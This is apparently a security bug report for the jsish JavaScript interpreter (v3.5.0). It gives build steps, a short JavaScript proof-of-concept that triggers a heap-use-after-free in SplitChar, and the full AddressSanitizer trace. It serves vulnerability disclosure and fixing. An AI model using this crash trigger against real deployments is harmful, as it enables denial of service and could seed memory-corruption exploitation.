heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar

[Ye0nny]

Jsish revision

Commit: 42c694c
Version: v3.5.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

export JSI__SANITIZE=1
make

Test case

testcase

try { 
	var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ;
	JSON. parse ( parse ( JSON. stringify ) ) ; 
} 
catch ( a ) { } 
JSON. stringify ( + a ) ;

// poc.js
try {
	var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ;
}
catch ( a ) { }

Execution steps & Output

$ ./jsish/jsish poc.js
max alloc exceeded 104857600Jsi_DSSetLength src/jsiDString.c:196
max alloc exceeded 211812340Jsi_DSSetLength src/jsiDString.c:196
=================================================================
==3962909==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f069b6bb7e8 at pc 0x000000552d3a bp 0x7fff816e51c0 sp 0x7fff816e51b8
WRITE of size 8 at 0x7f069b6bb7e8 thread T0
    #0 0x552d39 in SplitChar ./jsish/src/jsiUtils.c:2060:17
    #1 0x552d39 in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16
    #2 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9
    #3 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22
    #4 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10
    #5 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17
    #6 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25
    #7 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10
    #8 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c
    #9 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12
    #10 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18
    #11 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26
    #12 0x7f06aa752082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16
    #13 0x42c9bd in _start (./jsish/jsish+0x42c9bd)

0x7f069b6bb7e8 is located 5885928 bytes inside of 100000000-byte region [0x7f069b11e800,0x7f06a107c900)
freed by thread T0 here:
    #0 0x4a4e7d in free (./jsish/jsish+0x4a4e7d)
    #1 0x6047d4 in Jsi_ObjFree ./jsish/src/jsiObj.c:326:17

previously allocated by thread T0 here:
    #0 0x4a5419 in realloc (./jsish/jsish+0x4a5419)
    #1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15

SUMMARY: AddressSanitizer: heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar
Shadow bytes around the buggy address:
  0x0fe1536cf6a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf6b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf6d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0fe1536cf6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
  0x0fe1536cf700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf730: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3962909==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.